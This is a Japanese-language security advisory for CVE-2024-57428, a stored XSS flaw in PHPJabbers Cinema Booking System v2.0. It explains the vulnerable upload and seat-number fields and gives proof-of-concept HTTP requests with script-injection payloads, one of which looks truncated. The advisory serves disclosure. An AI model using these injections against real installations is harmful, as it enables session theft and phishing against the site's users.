
CVE-2024-57428: PHPJabbers Cinema Booking System v2.0は、ストアドXSSの脆弱性があり、フィッシングやマルウェア攻撃を目的とした持続的なJavaScriptインジェクションが可能です。
PHPJabbers Cinema Booking System v2.0における保存型クロスサイトスクリプティング(XSS)の脆弱性は、ファイルアップロードフィールド(event_img、seat_maps)および座席番号設定(pjActionCreate内のnumber[new_X])におけるサニタイズされていない入力に起因します。攻撃者は永続的なJavaScriptを注入でき、フィッシング、マルウェア注入、セッションハイジャックにつながります。
脆弱なパラメータ: event_img および seat_maps's file name
保存型XSSは反射型XSSよりも深刻です。注入されたコンテンツにアクセスするすべてのユーザーに影響を与えるためです。これは、永続的なフィッシング攻撃、セッションの盗難、または大規模なユーザーベースへのマルウェア注入に悪用される可能性があります。
ペイロード: \">
POST /CinemaBookingDev/index.php?controller=pjAdminEvents&action=pjActionCreate HTTP/1.1
Host: 127.0.0.1
Content-Length: 38611
[SNIP]
------WebKitFormBoundaryKOsvqJhAGpZAt33t
Content-Disposition: form-data; name="event_img"; filename="luffy.jpg\">"
Content-Type: image/jpeg
ペイロード: "><script>alert(x)</script>
POST /CinemaBookingDev/index.php?controller=pjAdminVenues&action=pjActionCreate HTTP/1.1
Host: 127.0.0.1
Content-Length: 1812
[SNIP]
------WebKitFormBoundaryip9Mc6LkKna3bpSD
Content-Disposition: form-data; name="seats_count"
11
------WebKitFormBoundaryip9Mc6LkKna3bpSD
Content-Disposition: form-data; name="number[new_1]"
1"><script>alert(1)</script>1
------WebKitFormBoundaryip9Mc6LkKna3bpSD
Content-Disposition: form-data; name="number[new_2]"
2"><script>alert(2)</script>2